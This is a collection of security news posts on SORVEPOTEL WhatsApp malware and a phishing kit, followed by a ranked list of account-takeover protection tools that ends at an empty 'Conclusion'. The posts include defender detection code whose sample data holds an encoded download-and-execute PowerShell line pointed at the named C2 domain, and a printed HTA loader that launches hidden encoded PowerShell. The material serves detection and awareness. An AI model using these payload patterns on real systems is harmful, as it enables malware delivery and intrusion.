• Enterprise networks worldwide are facing an aggressive, self-propagating malware campaign that exploits WhatsApp as its primary delivery mechanism.

    First observed in early September 2025 targeting Brazilian organizations, SORVEPOTEL spreads through convincing phishing messages carrying malicious ZIP attachments.

    Upon execution, the malware not only establishes a foothold on the host system but also hijacks active WhatsApp Web sessions to replicate itself across all contacts and groups associated with the compromised account.

    This unprecedented blend of social engineering and automated propagation has elevated SORVEPOTEL into a significant threat for enterprises relying on messaging platforms for internal communication.

    Initial reports traced the campaign to phishing messages bearing archive names such as RES-20250930112057.zip or ORCAMENTO114418.zip, masquerading as innocuous documents like receipts or budgets.

    These messages prompt users to “baixa o zip no PC e abre” (download the ZIP on PC and open it), explicitly targeting desktop sessions to maximize enterprise impact.

    Trend Micro analysts identified that an alternative infection vector involves phishing emails distributing similarly named ZIP attachments, often appearing to originate from trusted institutions with subjects like “ComprovanteSantander-75319981.682657420.zip.”

    Once the ZIP is extracted, the victim encounters a deceptive Windows shortcut (.LNK) file designed to launch a hidden PowerShell script, which downloads and executes the primary payload from attacker-controlled domains.

    Attack Chain

    As the .LNK file executes, it invokes an encoded command that launches a batch script in a concealed window.

    The SORVEPOTEL attack chain (Source – Trend Micro)

    The attack chain shows the encoded command line inside the shortcut: it hands a Base64 payload to PowerShell through the -enc (-EncodedCommand) parameter and runs the decoded text with Invoke-Expression (IEX), which keeps the payload out of casual inspection.

    This script retrieves a secondary batch file payload and establishes persistence by copying itself into the Windows Startup folder.

    Through a series of Base64-encoded PowerShell commands, the malware generates URLs pointing to command-and-control (C2) servers and uses Net.WebClient to fetch additional components, which are then executed in memory.

    The decoded command inside the batch file connects to the C2 infrastructure. By employing typo-squatted domains such as sorvetenopotel.com (a play on the Portuguese phrase “sorvete no pote”, ice cream in a tub), the attackers blend malicious traffic with legitimate network flows, evading basic detection mechanisms.
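    As an added defender-side illustration (not Trend Micro's code or anything from the report), the Python below decodes the Base64/UTF-16LE payload that PowerShell's -enc parameter carries and flags the IEX plus Net.WebClient download pattern and the typo-squatted domain named above in process-creation events. The tab-separated log format, the sample events and the placeholder URL path are constructed for the example.

```python
import base64
import binascii
import re
from dataclasses import dataclass

# PowerShell accepts any unambiguous prefix of -EncodedCommand; these are the usual
# spellings. The argument is Base64 of the command as UTF-16LE text.
ENC_FLAG = re.compile(
    r"(?:^|\s)-(?:encodedcommand|encodedc|enc|ec|e)\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)
HIDDEN_FLAG = re.compile(r"(?:^|\s)-w[a-z]*\s+hidden", re.IGNORECASE)
# Download-and-execute primitives the article ties to the SORVEPOTEL loader.
PAYLOAD_PATTERNS = [re.compile(p, re.IGNORECASE) for p in (
    r"\biex\b", r"invoke-expression", r"net\.webclient", r"download(?:string|file)")]
# The typo-squatted C2 domain named in the article; extend from your own intel.
KNOWN_C2_DOMAINS = ("sorvetenopotel.com",)


def ps_encode(command: str) -> str:
    """Encode text the way -EncodedCommand expects; used here only to build sample data."""
    return base64.b64encode(command.encode("utf-16-le")).decode("ascii")


def decode_encoded_command(cmdline: str):
    """Return the decoded -EncodedCommand text, or None if absent or not decodable."""
    m = ENC_FLAG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (binascii.Error, UnicodeDecodeError):
        return None


@dataclass
class Finding:
    image: str
    parent: str
    decoded: str
    reasons: list


def analyse_event(image: str, parent: str, cmdline: str):
    """Assess one process-creation event; returns a Finding or None."""
    if not image.lower().endswith("powershell.exe"):
        return None
    decoded = decode_encoded_command(cmdline)
    if decoded is None:
        return None
    reasons = [f"decoded payload matches /{p.pattern}/"
               for p in PAYLOAD_PATTERNS if p.search(decoded)]
    reasons += [f"references known C2 domain {d}"
                for d in KNOWN_C2_DOMAINS if d in decoded.lower()]
    if not reasons:  # encoded commands alone are common in legitimate admin tooling
        return None
    # Context matching the described chain: LNK -> cmd.exe (batch stage) -> hidden PowerShell
    if HIDDEN_FLAG.search(cmdline):
        reasons.append("hidden window requested")
    if parent.lower().endswith("cmd.exe"):
        reasons.append("spawned by cmd.exe (batch stage)")
    return Finding(image, parent, decoded, reasons)


def scan(log_text: str) -> list:
    """Parse tab-separated lines (timestamp, image, parent image, command line)."""
    findings = []
    for line in log_text.splitlines():
        if not line.strip():
            continue
        _ts, image, parent, cmdline = line.split("\t", 3)
        finding = analyse_event(image, parent, cmdline)
        if finding:
            findings.append(finding)
    return findings


# Constructed sample events, not real telemetry; the URL path is a placeholder.
PS_EXE = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_LOG = "\n".join([
    "\t".join(["2025-10-01T09:00:00Z", PS_EXE, r"C:\Windows\explorer.exe",
               "powershell.exe -NoProfile -EncodedCommand "
               + ps_encode("Get-Service | Where-Object Status -eq 'Running'")]),
    "\t".join(["2025-10-01T09:00:05Z", PS_EXE, r"C:\Windows\System32\cmd.exe",
               "powershell.exe -w hidden -enc "
               + ps_encode("IEX (New-Object Net.WebClient).DownloadString("
                           "'http://sorvetenopotel.com/PLACEHOLDER_PATH')")]),
    "\t".join(["2025-10-01T09:00:10Z", PS_EXE, r"C:\Windows\explorer.exe",
               r"powershell.exe -File C:\Scripts\backup.ps1"]),
])

if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f"{f.parent} -> {f.image}\n  decoded: {f.decoded}")
        for reason in f.reasons:
            print("  -", reason)
```

    Only the second sample event is reported: the benign encoded admin command and the plain -File invocation produce no finding.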

    Once persistence is in place, the malware scans for active WhatsApp Web sessions. Upon locating an authenticated session, SORVEPOTEL automatically propagates the same malicious ZIP across all contacts and groups.

    This automated spam not only multiplies infection rates but often results in compromised accounts being banned for violating WhatsApp’s terms of service.

    By combining social engineering, script-based execution, and rapid session hijacking, SORVEPOTEL demonstrates a novel escalation in messaging-platform attacks.

    The malware’s focus on widespread distribution rather than immediate data theft underscores a shift toward maximizing reach and operational disruption.

    Organizations should enforce strict endpoint policies to block unauthorized shortcuts, disable auto-download features in messaging applications, and conduct regular user awareness training to mitigate the evolving risk posed by self-propagating threats like SORVEPOTEL.

    The post Threat Actors Leveraging WhatsApp Messages to Attack Windows Systems With SORVEPOTEL Malware appeared first on Cyber Security News.

  • A novel phishing kit has surfaced that enables threat actors to craft sophisticated lures with minimal technical expertise.

    This “point-and-click” toolkit combines an intuitive web interface with powerful payload delivery mechanisms.

    Attackers can select from preconfigured templates, customize branding elements, and target specific organizations or individuals.

    Once a phishing page is deployed, victims are presented with seemingly innocuous download prompts that, in reality, trigger the delivery of malicious code.

    Ad promoting the Impact Solutions payload delivery kit to cybercriminals (Source – Abnormal.ai)

    Early incidents show the kit leveraging common file formats such as Microsoft Office documents and HTML applications.

    Upon opening, the documents prompt users to enable macros or allow execution of embedded scripts.

    Outsourcing the heavy lifting to built-in scripting engines, the kit constructs payloads on the fly, rendering many static signature–based defenses ineffective.

    Initial campaign data indicates a significant click-through rate, suggesting the social engineering elements are exceptionally convincing.

    Abnormal.ai analysts noted that the kit’s landing pages employ dynamic content injection to evade URL filtering solutions by rotating resource identifiers every few minutes.

    This approach frustrates automated scanners and contributes to extended dwell time on victim machines, allowing stealthy payload staging and execution.

    Researchers identified instances where the payload download URLs were concealed behind multi-step redirects, disguising their true destination until the final fetch operation.

    Furthermore, Abnormal.ai researchers identified that once the victim enables content execution, the embedded script executes a PowerShell one-liner that retrieves and executes the final payload from a remote server.

    This PowerShell command is obfuscated in Base64 and wrapped in a compressed archive, bypassing most heuristic engines. Victims remain unaware as the process runs with minimal user interaction and no visible windows.

    In-Depth Examination of the Infection Mechanism

    At the heart of the kit’s infection chain lies an HTML Application (HTA) module that acts as the initial loader.

    Fake invoice HTML page telling victims to open a file that launches malware (Source – Abnormal.ai)

    When the victim clicks “Enable Editing” or “Allow Blocked Content,” the HTA file executes:

    <script language="VBScript">
    ' WScript.Shell gives the HTA a way to spawn an arbitrary process
    Dim objShell
    Set objShell = CreateObject("WScript.Shell")
    ' Hidden PowerShell window; -EncodedCommand takes the Base64 (UTF-16LE) payload
    objShell.Run "powershell.exe -NoProfile -WindowStyle Hidden -EncodedCommand " & _
        "JABlAHgAZQBjAGUAbQBUAG8ARABvAHcAbgBsAG8AZABGAGUAcgBfAFIAZQBzAG8AdQByAGMAZQA9ICJuU0M…"
    </script>

    This snippet decodes to a PowerShell payload that downloads an encrypted binary, decrypts it in memory, and executes it directly from RAM.

    By operating in memory, the kit avoids writing malicious files to disk, undermining file-based detection.

    The downloaded binary functions as a modular loader, fetching additional components such as credential stealers or ransomware droppers.

    Persistence is achieved by creating a hidden scheduled task that re-launches the loader every hour under the context of the logged-on user.

    This tactic ensures continued access even if the initial document is closed or the machine is rebooted. The scheduled task name is randomized for each campaign, complicating manual detection efforts.
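    The hourly, hidden, user-context task is something a responder can hunt for in the task XML under System32\Tasks. The Python below is an added example, not Abnormal.ai's tooling: it scores a task definition on the traits described above (hourly repetition, Hidden=true, an InteractiveToken principal, a script-host action carrying an encoded command, and a random-looking name). The two task definitions and the name-randomness heuristic are constructed assumptions.

```python
import re
import xml.etree.ElementTree as ET
from pathlib import Path

NS = "{http://schemas.microsoft.com/windows/2004/02/mit/task}"
# Script hosts the described chain depends on (HTA loader, PowerShell one-liner).
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "mshta.exe", "wscript.exe", "cscript.exe", "cmd.exe"}
ENC_FLAG = re.compile(r"(?:^|\s)-(?:encodedcommand|encodedc|enc|ec|e)\s+[A-Za-z0-9+/=]{20,}", re.I)
ISO_DURATION = re.compile(r"^P(?:(\d+)D)?(?:T(?:(\d+)H)?(?:(\d+)M)?(?:(\d+)S)?)?$")


def duration_seconds(text):
    """Convert a Task Scheduler ISO 8601 duration (e.g. PT1H) to seconds; None if unparsable."""
    m = ISO_DURATION.match((text or "").strip())
    if not m:
        return None
    d, h, mi, s = (int(x) if x else 0 for x in m.groups())
    return d * 86400 + h * 3600 + mi * 60 + s


def looks_random(name):
    """Heuristic (our assumption, not from the report): many digits or long consonant
    runs do not look like the human-chosen names legitimate software registers."""
    if not any(c.isalpha() for c in name):
        return True
    digit_ratio = sum(c.isdigit() for c in name) / len(name)
    runs = re.findall(r"[bcdfghjklmnpqrstvwxz]+", name.lower())
    return digit_ratio >= 0.2 or max(map(len, runs), default=0) >= 5


def assess_task(xml_text, name):
    """Score one task definition against the traits described above; higher is worse."""
    root = ET.fromstring(xml_text)
    findings = []
    for interval in root.iter(NS + "Interval"):  # 1. repeats hourly or faster
        secs = duration_seconds(interval.text)
        if secs is not None and secs <= 3600:
            findings.append(f"repeats every {secs // 60} min")
            break
    if (root.findtext(f"./{NS}Settings/{NS}Hidden") or "").strip().lower() == "true":
        findings.append("Hidden=true")  # 2. hidden from the Task Scheduler UI
    logon = root.findtext(f"./{NS}Principals/{NS}Principal/{NS}LogonType") or ""
    if logon.strip() == "InteractiveToken":  # 3. runs in the logged-on user's session
        findings.append("runs in the interactive user's context")
    for ex in root.iter(NS + "Exec"):  # 4. script host, possibly with an encoded payload
        exe = (ex.findtext(NS + "Command") or "").strip().strip('"').lower().split("\\")[-1]
        if exe in SCRIPT_HOSTS:
            findings.append(f"action launches {exe}")
        if ENC_FLAG.search(ex.findtext(NS + "Arguments") or ""):
            findings.append("arguments carry an -EncodedCommand payload")
    if looks_random(name):  # 5. machine-generated name
        findings.append(f"task name {name!r} looks machine-generated")
    return {"name": name, "score": len(findings), "findings": findings}


def assess_file(path):
    """Real task files live under C:\\Windows\\System32\\Tasks as UTF-16 XML; the file
    name is the task name. Bytes are passed so the XML declaration picks the encoding."""
    p = Path(path)
    return assess_task(p.read_bytes(), p.name)


# Constructed sample definitions (not recovered from the kit); the Base64 is a placeholder.
SUSPICIOUS_XML = """<Task version="1.4" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <Triggers><TimeTrigger>
    <Repetition><Interval>PT1H</Interval><StopAtDurationEnd>false</StopAtDurationEnd></Repetition>
    <StartBoundary>2025-10-01T09:00:00</StartBoundary><Enabled>true</Enabled>
  </TimeTrigger></Triggers>
  <Principals><Principal id="Author">
    <LogonType>InteractiveToken</LogonType><RunLevel>LeastPrivilege</RunLevel>
  </Principal></Principals>
  <Settings><Hidden>true</Hidden></Settings>
  <Actions Context="Author"><Exec>
    <Command>powershell.exe</Command>
    <Arguments>-NoProfile -WindowStyle Hidden -EncodedCommand PLACEHOLDERBASE64BLOBPLACEHOLDER</Arguments>
  </Exec></Actions>
</Task>"""

BENIGN_XML = r"""<Task version="1.4" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <Triggers><CalendarTrigger>
    <StartBoundary>2025-10-01T02:00:00</StartBoundary><ScheduleByDay><DaysInterval>1</DaysInterval></ScheduleByDay>
  </CalendarTrigger></Triggers>
  <Principals><Principal id="Author"><LogonType>S4U</LogonType><RunLevel>HighestAvailable</RunLevel></Principal></Principals>
  <Settings><Hidden>false</Hidden></Settings>
  <Actions Context="Author"><Exec>
    <Command>C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Command>
    <Arguments>-NoProfile -ExecutionPolicy Bypass -File C:\Scripts\backup.ps1</Arguments>
  </Exec></Actions>
</Task>"""

if __name__ == "__main__":
    for xml_text, name in ((SUSPICIOUS_XML, "Xk7qP2mLw9Ra"), (BENIGN_XML, "Nightly Backup")):
        result = assess_task(xml_text, name)
        print(f"{name}: score {result['score']} -> {result['findings']}")
```

    A legitimate PowerShell maintenance task still scores one point for its script host; the combination of all five traits is what separates the loader's task from routine automation.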

    Overall, this point-and-click phishing kit represents a significant escalation in accessible attack capabilities, combining user-friendly interfaces with advanced evasion and payload delivery techniques.

    Cybersecurity teams must prioritize monitoring for anomalous task scheduler entries and unusual HTA executions, as well as reinforcing user training around enabling content in untrusted documents.

    The post New ‘Point-and-Click’ Phishing Kit Bypasses User Awareness and Security Filters to Deliver Malicious Payloads appeared first on Cyber Security News.

  • An aggressive malware campaign dubbed SORVEPOTEL is exploiting WhatsApp messages to infiltrate Windows systems, with its epicenter in Brazil. Rather than pursuing data theft or ransomware extortion, this self-propagating malware is engineered for rapid spread, leveraging social trust and automation to reach new victims. Trend Research telemetry shows that 457 of the 477 detected infections […]

    The post WhatsApp Exploited to Spread SORVEPOTEL Malware on Windows Systems appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.

  • Account Takeover (ATO) attacks have become one of the most pressing security concerns for businesses in 2025.

    With the rise of credential stuffing, phishing, brute force attacks, and bot-driven fraud, organizations must reinforce their digital defenses.

    Account takeover can lead to stolen customer data, financial losses, trust damage, and regulatory consequences. Protecting online accounts is no longer optional; it’s a necessity.

    The best way to mitigate ATO attacks is by using account takeover protection tools that combine behavioral analysis, AI-driven anomaly detection, strong authentication, and bot management.

    To help businesses choose wisely, we’ve ranked the Top 10 Best Account Takeover Protection Tools 2025 with complete specifications, features, reasons to buy, pros, cons, and best-fit suggestions.

    Why Account Takeover Protection Tools Matter in 2025

    Cybercriminals are becoming increasingly sophisticated, leveraging automated scripts, bots, and stolen credentials from past breaches.

    Businesses that operate in e-commerce, financial services, SaaS, and social platforms are especially vulnerable.

    Implementing a strong ATO protection tool not only safeguards users but also prevents financial fraud and enhances compliance with global data protection regulations.

    This list highlights solutions known for real-time threat detection, API protection, bot mitigation, authentication, and user experience optimization.

    Whether you’re a startup, enterprise, or online marketplace, these tools address security and scalability needs in 2025.

    Comparison Table: Top 10 Best Account Takeover Protection Tools 2025

    Account Takeover Tool           | Multi-Factor Authentication | AI/ML Integration | Bot Protection | API Security | Free Trial
    --------------------------------|-----------------------------|-------------------|----------------|--------------|-----------
    DataDome                        | ✅ Yes                      | ✅ Yes            | ✅ Yes         | ✅ Yes       | ❌ No
    Akamai Account Protector        | ✅ Yes                      | ✅ Yes            | ✅ Yes         | ✅ Yes       | ✅ Yes
    Imperva Advanced Bot Protection | ✅ Yes                      | ✅ Yes            | ✅ Yes         | ✅ Yes       | ❌ No
    Webz.io                         | ❌ No                       | ✅ Yes            | Limited        | ❌ No        | ✅ Yes
    Telesign                        | ✅ Yes                      | ✅ Yes            | Limited        | ✅ Yes       | ✅ Yes
    Forter                          | ✅ Yes                      | ✅ Yes            | ✅ Yes         | ✅ Yes       | ❌ No
    Beyond Identity                 | ✅ Yes                      | ✅ Yes            | Limited        | ✅ Yes       | ✅ Yes
    Sift                            | ✅ Yes                      | ✅ Yes            | ✅ Yes         | ✅ Yes       | ✅ Yes
    Kount                           | ✅ Yes                      | ✅ Yes            | ✅ Yes         | ✅ Yes       | ❌ No
    Radware Bot Manager             | ✅ Yes                      | ✅ Yes            | ✅ Yes         | ✅ Yes       | ✅ Yes

    1. DataDome

    Why We Picked It

    DataDome is one of the leading account takeover protection tools in 2025 because of its robust real-time bot detection and credential stuffing prevention capabilities.

    This solution leverages machine learning to analyze every request and distinguish legitimate users from malicious actors. It scans billions of data signals, enabling businesses to stay ahead of emerging threats.

    Its API-first approach ensures seamless integration with multiple platforms like e-commerce, SaaS, and financial services.

    We picked DataDome because it combines bot supervision, advanced ML algorithms, and easy deployment without impacting user experience.

    Specifications

    DataDome comes with a cloud-native architecture, which ensures high scalability for small and enterprise businesses. It integrates machine learning-driven traffic analysis that updates in milliseconds to stop malicious traffic.

    The solution works across websites, mobile apps, and APIs without requiring complex development changes.

    Features

    DataDome provides AI-driven fraud prevention, bot detection, strong credential abuse protection, and mobile SDK support. It includes dashboards for administrators to monitor and review account activity.

    Businesses can customize workflows and determine their security thresholds according to risks. E-commerce and financial platforms particularly benefit from its credential stuffing prevention.

    Reason to Buy

    Businesses should invest in DataDome for its accuracy in detecting bot-driven fraud, simplicity in deployment, and seamless integrations across digital ecosystems.

    It ensures a balance between user experience and strong security, making it one of the top solutions to fight automated account takeovers in 2025.

    Pros

    • Real-time bot and fraud detection
    • Scalable for large traffic volumes
    • Easy to integrate with apps and APIs
    • GDPR-compliant

    Cons

    • No free trial available
    • May require tuning for custom security use cases

    ✅ Best For: Enterprises needing high-traffic protection with AI-driven fraud and credential abuse prevention.

    🔗 Try DataDome here → DataDome Official Website

    2. Akamai

    Why We Picked It

    Akamai Account Protector stands as one of the most advanced solutions against account takeover in 2025 due to its comprehensive bot management, fraud detection, and high resilience in large-scale environments.

    We picked this tool because Akamai’s massive threat intelligence network gives businesses access to one of the largest real-time data lakes in the cybersecurity world.

    It continuously analyzes billions of requests across the globe, identifying attack patterns and protecting businesses before cybercriminals strike.

    With Akamai, organizations get predictive capabilities through AI, which reduces friction for legitimate customers while blocking malicious bot traffic.

    Specifications

    Akamai Account Protector integrates AI-driven behavioral analytics with a cloud-first design. It leverages Akamai’s global CDN infrastructure to detect attacks at the edge.

    This ensures ultra-low latency during user verification. It is compatible with multiple identity systems and supports MFA.

    Features

    The tool provides bot detection, credential stuffing prevention, multi-factor authentication (MFA) support, and API protection. It uses adaptive learning to monitor user patterns and detect anomalies in real-time.

    Its customer-friendly frictionless authentication is designed to reduce false positives. The platform includes session monitoring, device fingerprinting, and integration with SIEM solutions.

    Reason to Buy

    Organizations should choose Akamai for its blend of large-scale performance, threat intelligence network, and AI-powered account takeover defense.

    Its ability to prevent fraud in real-time without hurting user experience makes it a dependable security solution for large enterprises.

    Pros

    • Enterprise-level scalability
    • Strong threat intelligence network
    • Seamless integration with APIs and apps
    • Low latency authentication checks

    Cons

    • More suitable for large enterprises than small businesses
    • Pricing may be higher than other tools

    ✅ Best For: Large enterprises needing global-scale account takeover protection with AI-driven intelligence.

    🔗 Try Akamai here → Akamai Account Protector Official Website

    3. Imperva

    Why We Picked It

    Imperva Advanced Bot Protection is one of the most reliable tools against automated credential abuse and account fraud.

    We selected Imperva because it excels in identifying malicious bots while simultaneously protecting sensitive customer accounts. Its sophisticated algorithms analyze intent and distinguish between good and bad bots across websites, applications, and APIs.

    What makes Imperva unique is the balance between detection precision and prevention without disrupting legitimate traffic. It is known for targeted solutions against massive credential stuffing attacks and automated scalping bots.

    Specifications

    Imperva leverages cloud-based mitigation paired with global attack intelligence. It comes with real-time data analysis, device fingerprinting, and behavioral machine learning.

    Its API protection ensures secure transactions while supporting enterprise-level scalability. It integrates with fraud databases and features reports with actionable threat insights.

    Features

    Key features include bot traffic mitigation, credential stuffing filters, device intelligence, granular attack analytics, and multi-layer defense.

    It offers data-driven decisions through rich dashboards with visual attack breakdowns. Its adaptive authentication features help businesses minimize risks without unnecessary login friction.

    Reason to Buy

    Imperva should be chosen for its robust bot filtering accuracy and tailored solutions for industries frequently targeted by bots. Security leaders value its flexibility and data-rich visibility for fraud analysis.

    Pros

    • High accuracy threat detection
    • Strong for financial and retail industries
    • Rich reporting and dashboards
    • Cloud-based + scalable design

    Cons

    • No free trial
    • Can be complex during heavy customization

    ✅ Best For: Companies needing bot protection and fine-grained visibility into fraudulent traffic.

    🔗 Try Imperva here → Imperva Official Website

    4. Webz.io

    Why We Picked It

    Webz.io makes this list because of its dark web intelligence and monitoring capabilities, providing businesses with proactive protection insights.

    Account takeover often stems from compromised credentials being sold or leaked on underground forums, and Webz.io specializes in scanning that hidden web.

    We picked this tool because it detects stolen email/password pairs and notifies businesses early, allowing preemptive action before those accounts are exploited.

    Unlike tools that focus only on runtime detection, Webz.io identifies external risks by monitoring hacker forums, IRC chats, marketplaces, and credential leak databases.

    Specifications

    Webz.io is a data intelligence platform specializing in dark web monitoring. It scans millions of sources for stolen data, exposed credentials, and malicious chatter.

    With flexible API integrations, businesses can connect dark web insights directly into their SOC or fraud prevention pipelines. It works in real-time and sends alerts for high-risk findings.

    Features

    Webz.io provides credential leak detection, dark web and deep web scanning, API integrations, and continuous monitoring services. It enables early warning alerts about compromised accounts and supports custom feeds tailored by business type.

    Reason to Buy

    For businesses looking to proactively stop account takeover by catching stolen credentials before use, Webz.io is an essential tool.

    It complements bot and fraud detection systems with external threat intelligence.

    Pros

    • Specialized dark web monitoring
    • Real-time stolen credential detection
    • Easy API and SOC integrations
    • Early warning against fraud risks

    Cons

    • Limited direct bot detection features
    • Requires additional fraud prevention pairing

    ✅ Best For: Businesses needing dark web monitoring for stolen credentials and early prevention.

    🔗 Try Webz.io here → Webz.io Official Website

    5. Telesign

    Why We Picked It

    Telesign is included because of its advanced multi-factor authentication and fraud prevention APIs that strengthen identity verification processes.

    We picked Telesign as it emphasizes securing access through verification codes, two-factor authentication (2FA), and trusted communications.

    For businesses facing threats from credential stuffing or phishing-driven takeovers, Telesign ensures that only the right person can access the right account.

    Its combination of fraud scoring, phone-based verification, and strong authentication makes it stand out.

    Specifications

    Telesign provides APIs for 2FA, phone verification, fraud scoring, and identity services.

    It uses data signals including phone intelligence and reputation scoring to determine access risks. Its infrastructure supports global SMS delivery and real-time voice alerts.

    Features

    It includes verification APIs, SMS one-time passcodes, fraud scoring models, and trusted communication APIs.

    Businesses can integrate Telesign into onboarding, transactions, and logins with minimal effort. Its machine learning engine analyzes risk patterns and applies adaptive responses.

    Reason to Buy

    Telesign should be considered by companies prioritizing user verification and scalable authentication systems. Its API-driven identity checks provide strong protection against credential abuse.

    Pros

    • Strong fraud scoring and verification APIs
    • Cost-effective and developer-friendly
    • Broad international communication reach
    • Flexible deployment via APIs

    Cons

    • Relies heavily on telecom channels
    • Less focus on bot-driven ATO

    ✅ Best For: Businesses needing robust API-driven identity and authentication protection.

    🔗 Try Telesign here → Telesign Official Website

    6. Forter

    Why We Picked It

    Forter is one of the most trusted account takeover protection tools in 2025, primarily because of its focus on frictionless fraud prevention.

    We chose Forter for this list as it provides real-time trust decisions at scale, leveraging data shared across a global fraud prevention network.

    This unique network allows Forter to quickly identify risky logins, credential stuffing attempts, and unusual account behaviors that could indicate account takeover.

    The tool is known for its ability to minimize friction and improve user experience while still delivering strong protection.

    Specifications

    Forter comes with cloud-based fraud detection, AI-driven authentication, and an extensive trust network that evaluates events in real time.

    It integrates seamlessly with checkout systems, login portals, and APIs. The platform is designed to scale with enterprise demands, particularly in retail and payments.

    Features

    Key features include fraud detection, behavioral analytics, risk profiling, credential stuffing identification, and frictionless user authentication.

    It supports multiple integration options, including SDKs and APIs. Forter also provides advanced reporting and analytics for visibility into fraud risks.

    Reason to Buy

    Forter is ideal if your business needs instant trust decisions that prevent ATO without hurting user experience. It empowers enterprises with a scalable, low-latency fraud prevention tool trusted globally.

    Pros

    • Global fraud prevention network
    • Instant risk decisioning
    • Frictionless protection
    • Strong focus on e-commerce industry

    Cons

    • Best suited for enterprises, not SMBs
    • Pricing may be complex for smaller businesses

    ✅ Best For: Large e-commerce and online payments needing seamless fraud prevention.

    🔗 Try Forter here → Forter Official Website

    7. Beyond Identity

    Why We Picked It

    Beyond Identity was selected for this list because it eliminates passwords, one of the most common entry points for account takeover attacks.

    By focusing on passwordless authentication, Beyond Identity reduces credential theft risks entirely. We picked this platform since it leverages cryptographic key pairs and biometrics to authenticate users without reliance on passwords.

    The platform stands out because it creates a zero-trust authentication framework, ensuring that only verified and trusted devices can access sensitive accounts.

    Unlike solutions that just monitor logins, Beyond Identity takes a preventive security-first approach, making it cutting-edge for 2025.

    Specifications

    The tool offers passwordless authentication based on public/private key cryptography and biometric verification.

    It supports FIDO2 standards, device intelligence, and continuous risk-based authentication. With easy SDK and API integration, Beyond Identity is developer-friendly for modern tech stacks.

    Features

    Its main features include passwordless logins, device trust verification, secure identity management, compliance tools, and conditional policy controls.

    It provides strong user protection without compromising convenience. The system works across web and mobile platforms with minimal latency.

    Reason to Buy

    Beyond Identity removes passwords and replaces them with secure, frictionless authentication based on cryptography. It’s a strong investment for businesses that want to make ATO almost impossible.

    Pros

    • Eliminates password vulnerabilities
    • Supports FIDO2 framework
    • Strong authentication + device trust
    • Improves UX with frictionless access

    Cons

    • May require cultural adoption for passwordless systems
    • Limited for businesses wanting traditional MFA

    ✅ Best For: Organizations needing passwordless, zero-trust authentication against ATO.

    🔗 Try Beyond Identity here → Beyond Identity Official Website

    8. Sift

    Why We Picked It

    Sift earned a spot on this list because of its machine-learning-powered fraud detection and behavioral analytics engine.

    We picked Sift as it continuously monitors user activity in real time, allowing businesses to detect unusual login patterns, credential stuffing, and bot-driven attempts instantly.

    Sift is known for its Digital Trust & Safety Suite, which combines account takeover prevention with payment fraud, content integrity, and abuse prevention.

    By focusing on maintaining trust across customer journeys, Sift offers a holistic approach. Enterprises value this solution as it cuts down both risk and friction, especially in industries like fintech, marketplaces, and travel.

    Specifications

    Sift uses behavioral machine learning, real-time fraud detection, and global risk signals to assess threats.

    It offers API-first deployment and can integrate with multiple web, mobile, and enterprise applications. It supports advanced anomaly detection and large-scale monitoring of login activities.

    Features

    The tool includes account protection against credential stuffing, real-time fraud scoring, adaptive authentication, behavioral biometrics, and reporting dashboards.

    Businesses can also take advantage of its machine learning engine that evolves with threats.

    Reason to Buy

    Sift is a good choice for businesses that require scalable machine-learning driven fraud prevention across multiple risk scenarios, including account takeovers.

    Pros

    • Holistic fraud prevention suite
    • Real-time global risk signals
    • Adaptive AI-driven authentication
    • Ideal for fintech and marketplaces

    Cons

    • Pricing may vary based on usage
    • Advanced features require configuration expertise

    ✅ Best For: Businesses needing scalable AI-powered fraud and ATO detection.

    🔗 Try Sift here → Sift Official Website

    9. Kount

    Why We Picked It

    Kount makes our list due to its AI-driven identity trust platform that prevents account takeovers through advanced identity verification.

    We picked Kount because it offers strong fraud detection across logins, new account creation, and payments. Its patented Identity Trust Global Network shares intelligence across industries to stop fraudulent activity at scale.

    The tool is widely recognized in fintech and e-commerce for its high accuracy in identifying ATO attacks while providing customizable workflows to enterprises.

    Kount’s ability to detect fake accounts and block account takeovers before they cause damage makes it a standout. It is designed with enterprise scale in mind, offering a reliable and proven fraud protection stack.

    Specifications

    Kount operates using AI, machine learning, and patented identity trust analytics. It integrates easily through APIs into login systems and e-commerce platforms.

    Designed for enterprise scale, the platform handles large volumes of logins and payment transactions with minimal latency.

    Features

    Core features include global identity trust monitoring, behavioral biometrics, new account fraud detection, bot-blocking, and session intelligence. It also provides fraud risk scores in real time.

    Reason to Buy

    Kount is a strong investment for businesses that want intelligent, adaptable, and large-scale fraud protection focusing on identity-first account takeover defense.

    Pros

    • Uses patented ID Trust Global Network
    • Strong for payment fraud + ATO
    • AI-driven adaptive protection
    • Seamless integrations with apps and APIs

    Cons

    • May be costly for smaller businesses
    • Advanced features may require technical expertise

    ✅ Best For: E-commerce and financial services needing advanced identity trust-based fraud prevention.

    🔗 Try Kount here → Kount Official Website

    10. Radware

    Why We Picked It

    Radware Bot Manager is included because of its robust bot mitigation technology tailored for account takeover.

    We selected Radware due to its advanced detection of sophisticated bots attempting credential stuffing, brute force attacks, or scraping activities.

    By monitoring behavioral and intent-based data signals, Radware efficiently identifies harmful automation. The tool is effective in protecting businesses from both large-scale coordinated attacks and subtle low-and-slow bot operations.

    It also empowers security teams with actionable analytics for review. This makes it a great option for enterprises involved in e-commerce, gaming, banking, or any high-risk online environment.

    Specifications

    Radware Bot Manager includes AI and intent-based bot analysis with cloud-native deployment. It integrates with WAFs, APIs, and load balancers.

    The platform can serve global businesses across multiple regions while ensuring high-speed response at scale.

    Features

    Key features include sophisticated bot detection, API protection, device fingerprinting, user behavior analysis, dynamic honeypots, and reporting dashboards.

    It also supports adaptive policy controls for fine-grained bot traffic management.

    Reason to Buy

    Radware Bot Manager is an excellent solution for enterprises that deal with bots as part of their account takeover threat landscape. It offers strong, customizable anti-bot defense.

    Pros

    • Strong bot mitigation
    • Customizable protection policies
    • Adaptive AI-based analysis
    • Real-time analytics

    Cons

    • Pricing not suitable for SMBs
    • May involve complex deployment for non-enterprises

    ✅ Best For: Enterprises combating advanced bot-driven ATO attacks.

    🔗 Try Radware here → Radware Official Website

    Conclusion

